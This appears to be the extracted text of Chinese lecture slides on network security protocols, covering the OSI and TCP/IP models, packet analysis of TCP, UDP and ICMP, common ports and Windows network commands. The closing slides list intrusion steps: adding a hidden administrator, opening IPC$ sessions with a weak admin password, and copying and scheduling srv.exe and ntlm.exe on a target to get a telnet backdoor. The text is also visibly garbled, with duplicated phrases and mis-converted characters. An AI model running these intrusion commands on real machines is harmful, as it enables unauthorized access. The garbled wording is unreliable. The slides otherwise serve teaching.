网络安全协议基础PPT课件

第二章 网络平安协议根底 内容提要n本章介绍OSI七层网络模型nTCP/IP协议簇。n重点介绍IP协议、TCP协议、UDP协议和ICMP协议。n介绍常用的网络效劳：文件传输效劳、Telnet效劳、电子邮件效劳和、Web效劳n介绍常用的网络效劳端口和常用的网络命令的使用。ISO-OSI模型PDU:Protocol Data Unit 协议数据单元帧分组物理层：缆线，信号的编码，网络接插件的电、机械接口数据链路层：成帧，过失控制、流量控制，物理寻址，媒体访问控制网络层：路由、转发，拥塞控制传输层：为会话层提供与下面网络无关的可靠消息传送机制 会话层：负责建立或去除在两个通信的表示层之间的通信通道，包括交互管理、同步，异常报告。表示层：在两个应用层之间的传输过程中负责数据的表示语法应用层：处理应用进程之间所发送和接收的数据中包含的信息内容。数据的封装PhysicalPhysicalData linkData linkNetworkNetworkTransportTransportSessionSessionPresentationPresentationApplicationApplicationPhysicalPhysicalData linkData linkNetworkNetworkTransportTransportSessionSessionPresentationPresentationApplicationApplicationAAAAAAPPPPPSSSSTTTNNDDVirtualdata flowActual data flowSenderReceiverPhysicalPhysicalData linkData linkNetworkNetworkTransportTransportSessionSessionPresentationPresentationApplicationApplicationPhysicalPhysicalData linkData linkNetworkNetworkTransportTransportSessionSessionPresentationPresentationApplicationApplicationPhysicalPhysicalData linkData linkNetworkNetworkTransportTransportSessionSessionPresentationPresentationApplicationApplicationAAAAAAPPPPPSSSSTTTNNDDVirtualdata flowActual data flowSenderReceiverOSIOSImnemonicsmnemonicsA AllP PeopleS SeemT ToN NeedD DataP ProcessingP PleaseD DoN NotT ThrowS SausageP PizzaA Away应用层表示层会话层传输层网络层数据链路层物理层TCP/IP模型OSI与TCP/IP模型的比较相同点：1.都是基于独立的协议栈概念。2.两者都有功能相似的应用层、传输层、网络层。不同点：1.在OSI模型中，严格地定义了效劳、接口、协议；在TCP/IP模型中，并没有严格区分效劳、接口与协议。2.OSI模型支持非连接和面向连接的网络层通信，但在传输层只支持面向连接的通信；TCP/IP模型只支持非连接的网络层通信，但在传输层有支持非连接和面向连接的两种协议可供用户选择。3.TCP/IP模型中不区分、甚至不提起物理层和数据链路层。平安体系结构平安攻击n主动攻击:更改数据流，或伪造假的数据流。n伪装masquerade)n重放(replay)n篡改(modification)n拒绝效劳(denial of service)n被动攻击:对传输进行偷听与监视，获得传输信息。n报文分析n流量分析即冒名顶替。一般而言，伪装攻击的同时往往还伴随着其他形式的主动攻击 先被动地窃取通信数据，然后再有目的地重新发送 即修改报文的内容。或者对截获的报文延迟、重新排序阻止或占据对通信设施的正常使用或管理。针对特定目标或是某个网络窃听和分析所传输的报文内容 分析通信主机的位置、通信的频繁程度、报文长度等信息 平安体系结构平安机制n加密：用加密算法对信息加密。保护信息的机密性加密：用加密算法对信息加密。保护信息的机密性n数字签名：用签名算法对信息进行计算，计算结果附加于信数字签名：用签名算法对信息进行计算，计算结果附加于信息单元。用于身份认证、数据完整性和非否认效劳息单元。用于身份认证、数据完整性和非否认效劳n访问控制：用于实施资源访问权限的机制访问控制：用于实施资源访问权限的机制n数据完整性：用于确保信息的完整性数据完整性：用于确保信息的完整性n身份认证：确保信息交换的实体是所声称的实体身份认证：确保信息交换的实体是所声称的实体n流量填充：填充信息，防止流量分析流量填充：填充信息，防止流量分析n路由控制：能够为特定数据选择特定路由路由控制：能够为特定数据选择特定路由n公证：采用可信任的第三方以确保一些信息交换的性质公证：采用可信任的第三方以确保一些信息交换的性质平安体系结构平安效劳n认证认证Authentication:提供某个实体的身份保证提供某个实体的身份保证n对等实体认证对等实体认证n数据源认证数据源认证n访问控制访问控制Access control:保护资源，防止对它的非法保护资源，防止对它的非法使用和操纵使用和操纵n数据机密性数据机密性Data encryption:保护信息不被泄露保护信息不被泄露n数据完整性数据完整性Integrity:保护信息以防止非法篡改保护信息以防止非法篡改n不可否认性不可否认性No-repudiation:防止参与通信的一方事后防止参与通信的一方事后否认否认n可用性可用性 Availability：确保系统的可用：确保系统的可用网络平安模型算法算法机制机制协议协议身份认证信息的机密性、完整性、不可否认性Security Protocols(Services)Standards-based Security ProtocolsProprietary Security ProtocolsSSLIPSecPrivateWireBig BrotherMechanismsEncryptionSignatureHashingKey ExchangeAlgorithmsSymmetricAsymmetricAsymmetricSymmetricMD-5SHA-1Diffie-HellmanDESAESRSAECCDSARSADESMACServices,Mechanisms,Algorithms网络访问平安模型Firewalls and Security Gateways IDSVPN保证网络的可用性、可控性网络各层的相关平安协议n链路层：链路隧道协议、加密技术n网络层：包过滤、IPSEC协议、VPNn传输层/会话层：SSL/TLS 协议n应用层：SHTTP、PGP、S/MIME等解剖TCP/IP模型nTCP/IP组的四层、OSI参考模型和常用协议的对应关系如图2-3所示。抓取Ping指令发送的数据包n按照第一章Sniffer的设置抓取Ping指令发送的数据包，命令执行如图2-4所示。抓取Ping指令发送的数据包抓取Ping指令发送的数据包n其实IP报头的所有属性都在报头中显示出来，可以看出实际抓取的数据报和理论上的数据报一致，分析如图2-6所示。IPv4的IP地址分类 nIPv4地址在1981年9月实现标准化的。根本的IP地址是8位一个单元的32位二进制数。为了方便人们的使用，对机器友好的二进制地址转变为人们更熟悉的十进制地址。nIP地址中的每一个8位组用0255之间的一个十进制数表示。这些数之间用点“.隔开，因此，最小的IPv4地址值为，最大的地址值为，然而这两个值是保存的，没有分配给任何系统。nIP地址分成五类：A类地址、B类地址、C类地址、D类地址和E类地址。n每一个IP地址包括两局部：网络地址和主机地址，上面五类地址对所支持的网络数和主机数有不同的组合。传输控制协议协议TCP nTCP是传输层协议，提供可靠的应用数据传输。nTCP在两个或多个主机之间建立面向连接的通信。nTCP支持多数据流操作，提供错误控制，甚至完成对乱序到达的报文进行重新排序。一次完整的FTP会话 n首先开启目标主机的FTP效劳，如图2-7所示。一次完整的FTP会话n启动Sniffer，然后在主机的DOS命令行下利用FTP指令连接目标主机上的FTP效劳器，连接过程如图2-8所示。一次完整的FTP会话一次完整的FTP会话n登录FTP的过程是一次典型的TCP连接，因为FTP效劳使用的是TCP协议。分析TCP报头的结构如图2-10所示。传输控制协议TCP的特点n传输控制协议传输控制协议TCP的特点是：提供可靠的、的特点是：提供可靠的、面向连接的数据报传递效劳。面向连接的数据报传递效劳。n传输控制协议可以做到如下的六点：传输控制协议可以做到如下的六点：n1、确保、确保IP数据报的成功传递。数据报的成功传递。n2、对程序发送的大块数据进行分段和重组。、对程序发送的大块数据进行分段和重组。n3、确保正确排序以及按顺序传递分段的数据。、确保正确排序以及按顺序传递分段的数据。n4、通过计算校验和，进行传输数据的完整性检查。、通过计算校验和，进行传输数据的完整性检查。n5、根据数据是否接收成功发送消息。通过有选择、根据数据是否接收成功发送消息。通过有选择确实认，也对没有收到的数据发送确认。确实认，也对没有收到的数据发送确认。n6、为必须使用可靠的基于会话的数据传输的程序、为必须使用可靠的基于会话的数据传输的程序提供支持，如数据库效劳和电子邮件效劳。提供支持，如数据库效劳和电子邮件效劳。TCP协议的工作原理 nTCP提供两个网络主机之间的点对点通讯。TCP从程序中接收数据并将数据处理成字节流。n首先将字节分成段，然后对段进行编号和排序以便传输。在两个TCP主机之间交换数据之前，必须先相互建立会话。TCP会话通过三次握手的完成初始化。nTCP在建立连接的时候需要三次确认，俗称“三次握手，在断开连接的时候需要四次确认，俗称“四次挥手。TCP协议的三次“握手 TCP协议的三次“握手n这个过程在FTP的会话过程中也明显的显示出来，如图2-12所示。第一次“握手 n首先分析建立“握手第一个过程包的结构，如图2-13所示。SYN=1,ACK=0第二次“握手 nSYN为1，开始建立请求连接，需要对方计算机确认，对方计算机确认返回的数据包。ACK=1,SYN=1 第三次“握手 nACK=1,SYN=0n这个时候需要源计算机确实认就可以建立连接了。TCP协议的四次“挥手 n需要断开连接的时候，TCP也需要互相确认才可以断开连接，四次交互过程如图2-16所示。第一次“挥手 n第一次交互过程的数据报结构第二次“挥手 n第一次交互中，首先发送一个FIN=1的请求，要求断开，目标主机在得到请求后发送ACK=1进行确认第三次“挥手 n在确认信息发出后，就发送了一FIN=1的包，与源主机断开。第四次“挥手 n随后源主机返回一条ACK=1的信息，这样一次完整的TCP会话就结束了。用户数据报协议UDP nUDP为应用程序提供发送和接收数据报的功能。n某些程序比方腾讯的OICQ使用的是UDP协议，UDP协议在TCP/IP主机之间建立快速、轻便、不可靠的数据传输通道。UDP和TCP传递数据的差异nUDP和TCP传递数据的差异类似于 和明信片之间的差异。nTCP就像 ，必须先验证目标是否可以访问后才开始通讯。nUDP就像明信片，信息量很小而且每次传递成功的可能性很高，但是不能完全保证传递成功。nUDP通常由每次传输少量数据或有实时需要的程序使用。n在这些情况下，UDP 的低开销比TCP 更适合。UDP 与TCP 提供的效劳和功能直接比照 UDP和TCP传递数据的比较 UDP协议协议TCP协议协议无连接的服务；在主机之间不建立会无连接的服务；在主机之间不建立会话。话。面向连接的服务；在主机之间建立会话。面向连接的服务；在主机之间建立会话。UDP不能确保或承认数据传递或序列不能确保或承认数据传递或序列化数据。化数据。TCP 通过确认和按顺序传递数据来确保数据通过确认和按顺序传递数据来确保数据的传递。的传递。使用使用 UDP 的程序负责提供传输数据所的程序负责提供传输数据所需的可靠性。需的可靠性。使用使用 TCP 的程序能确保可靠的数据传输。的程序能确保可靠的数据传输。UDP快速，具有低开销要求，并支持快速，具有低开销要求，并支持点对点和一点对多点的通讯。点对点和一点对多点的通讯。TCP 比较慢，有更高的开销要求，而且只支比较慢，有更高的开销要求，而且只支持点对点通讯。持点对点通讯。UDP 和和 TCP 都使用端口标识每个都使用端口标识每个 TCP/IP 程序的通讯。程序的通讯。UDP数据报分析 n常用的网络效劳中，DNS使用UDP协议。DNS是域名系统(Domain Name System)的缩写n当用户在应用程序中输入DNS名称时，DNS效劳可以将此名称解析为与此名称相关的IP地址。n 用域名访问用域名访问用用IP地址访问地址访问设置DNS解析n需要在主机上设置DNS解析的主机，将主机的DNS的解析指向虚拟机，如图2-22所示。自动获取地址中的 DNS设置DNS解析n虽然虚拟机并没有设置DNS解析，但是只要访问DNS都可以抓到UDP数据报。设置完毕后，在主机的DOS界面中输入命令nslookup，如图2-23所示。UDP报头n查看Sniffer抓取的数据报，可以看到UDP报头，如图2-24所示。UDP报头的分析n对UDP报头的分析如图2-25所示。互联网控制消息协议ICMP n通过ICMP协议，主机和路由器可以报告错误并交换相关的状态信息。在以下情况中，通常自动发送ICMP消息：nIP数据报无法访问目标。nIP路由器网关无法按当前的传输速率转发数据报。nIP路由器将发送主机重定向为使用更好的到达目标的路。nICMP协议的结构如图2-26所示。ICMP协议的结构 ICMP数据报分析 n使用Ping命令发送ICMP回应请求消息，使用Ping命令，可以检测网络或主机通讯故障并解决常见的TCP/IP连接问题。分析Ping指令的数据报，如图2-27所示。FTP效劳 nFTP的缺省端口是20用于数据传输和21用于命令传输。n在TCP/IP中FTP是非常独特的，因为命令和数据能够同时传输，而数据传输是实时的，其他协议不具有这个特性。nFTP客户端可以是命令界面的也可以是图形界面的。命令界面的如图2-28所示。命令行等录FTP效劳器 图形界面登录FTP效劳器 n也可以在浏览器中输入“ftp:/主机IP地址，利用图形界面连接FTP效劳器，如图2-29所示。更改登录用户信息n登录FTP可以更改登录用户信息，选择菜单“文件下的菜单项“登录，出现用户名输入对话框，如图2-30所示。Telnet效劳 nTelnet是TELecommunications NETwork的缩写，其名字具有双重含义，既指应用也是指协议自身。nTelnet给用户提供了一种通过网络登录远程效劳器的方式。nTelnet通过端口23工作。开启Telnet效劳nTelnet要求有一个Telnet效劳器，此效劳器驻留在主机上，等待着远端机器的授权登录。要使用Telnet效劳首先需要在虚拟机上开启Telnet效劳，选择进入Telnet效劳管理器，如图2-31所示。开启Telnet效劳n在Telnet效劳管理器中选择4，启动Telnet效劳器，如图2-32所示。连接Telnet效劳器n虚拟机上的Telnet效劳器就启动了，然后在主机的DOS窗口中连接虚拟机的Telnet效劳器，如图2-33所示。Email效劳n目前Email效劳用的两个主要的协议是：简单邮件传输协议SMTPSimple Mail Transfer Protocol和邮局协议POP3Post Office Protocol。nSMTP默认占用25端口，用来发送邮件，POP3占用110端口，用来接收邮件。n在Windows平台下，主要利用Microsoft Exchange Server作为电子邮件效劳器。Web效劳nWeb效劳是目前最常用的效劳，使用HTTP协议，默认Web效劳占用80端口n在Windows平台下一般使用IISInternet Information Server作为Web效劳器。常用的网络效劳端口 n常用效劳端口列表 端口协议服务21TCPFTP服务25TCPSMTP服务53 TCP/UDPDNS服务80TCPWeb服务135TCPRPC服务137UDPNetBIOS域名服务138UDPNetBIOS数据报服务139TCPNetBIOS会话服务443TCP基于SSL的HTTP服务445TCP/UDPMicrosoft SMB服务3389TCPWindows终端服务常用的网络命令 n常用的网络命令有：判断主机是否连通的ping指令查看IP地址配置情况的ipconfig指令查看网络连接状态的netstat指令进行网络操作的net指令进行定时器操作的at指令。进行路由跟踪的tracert指令。ping nping指令通过发送ICMP包来验证与另一台TCP/IP计算机的IP级连接。n应答消息的接收情况将和往返过程的次数一起显示出来。nping指令用于检测网络的连接性和可到达性，如果不带参数，ping将显示帮助，如图2-39所示。ping ping n可以利用ping指令验证和对方计算机的连通性，使用的语法是“ping 对方计算机名或者IP地址。如果连通的话，返回的信息如图2-40所示。ipconfig指令 nipconfig指令显示所有TCP/IP网络配置信息、刷新动态主机配置协议DHCP,Dynamic Host Configuration Protocol和域名系统DNS设置。n使用不带参数的ipconfig可以显示所有适配器的IP地址、子网掩码和默认网关。在DOS命令行下输入ipconfig指令。netstat指令 nnetstat指令显示活动的连接、计算机监听的端口、以太网统计信息、IP 路由表、IPv4统计信息IP、ICMP、TCP和UDP协议。n使用“netstat-an命令可以查看目前活动的连接和开放的端口，是网络管理员查看网络是否被入侵的最简单方法。使用的方法如图2-43所示。net指令 nnet指令的功能非常的强大，net指令在网络平安领域通常用来查看计算机上的用户列表、添加和删除用户、和对方计算机建立连接、启动或者停止某网络效劳等。n利用“net user查看计算机上的用户列表，如图2-44所示。net 指令nnet use 列出本机网络连接nnet use IPipc$“密码/user:帐号 ；建立与指定IP的IPC$(空连接)nnet use z:IPc$“密码/user:“帐号 ；将对方的c盘映射为自己的z盘nnet use IPipc$/del 删除与指定IP的IPC$连接nnet use z:/del 删除本机映射的z盘nnet use*/del 删除本机所有映射和IPC$连接nnet share 查看本地主机共享资源nnet time IP 查看远程主机的当前时间nnet start 显示本地主机当前效劳 net指令n利用“net user 用户名 密码给某用户修改密码，比方把管理员的密码修改成“123456，如图2-45所示。案例2-2 建立用户并添加到管理员组 n案例名称：添加用户到管理员组案例名称：添加用户到管理员组n文件名称：文件名称：2-01.batn nnet user jack 123456/add 添加用户添加用户nnet localgroup administrators jack/add 将用户添加到管理员组将用户添加到管理员组nnet user 查看用户查看用户n 和对方计算机建立信任连接 n只要拥有某主机的用户名和密码，就可以用“IPC$Internet Protocol Control建立信任连接，建立完信任连接后，可以在命令行下完全控制对方计算机。n比方得到IP为计算机的管理员密码为123456，可以利用指令“net use 172.18.25.109ipc$123456/user:administrator，如图2-47所示。和对方计算机建立信任连接n建立完毕后，就可以操作对方的计算机，比方查看对方计算机上的文件，如图2-48所示。at指令 n案例名称：创立定时器案例名称：创立定时器n文件名称：文件名称：2-02.batn nnet use*/delnnet use 172.18.25.109ipc$123456/user:administratornat 172.18.25.109 8:40 notepad.exetracert 指令 经典入侵模式(IPC入侵)1C:net use IPIPC$/user:admintitrators 2C:copy srv.exe IPadmin$3C:net time IP4C:at IP 11:05 srv.exe 5C:telnet IP 99 6C:copy ntlm.exe IPadmin$7C:WINNTsystem32ntlm 8telnet IP 本章总结n本章需要重点理解OSI参考模型和TCP/IP协议簇的联系和区别n理解IP/TCP/UDP/ICMP协议头的结构并且学会使用Sniffer进行分析n了解常用的网络效劳以及它们提供效劳的端口。n熟练掌握常用网络命令及其使用方法。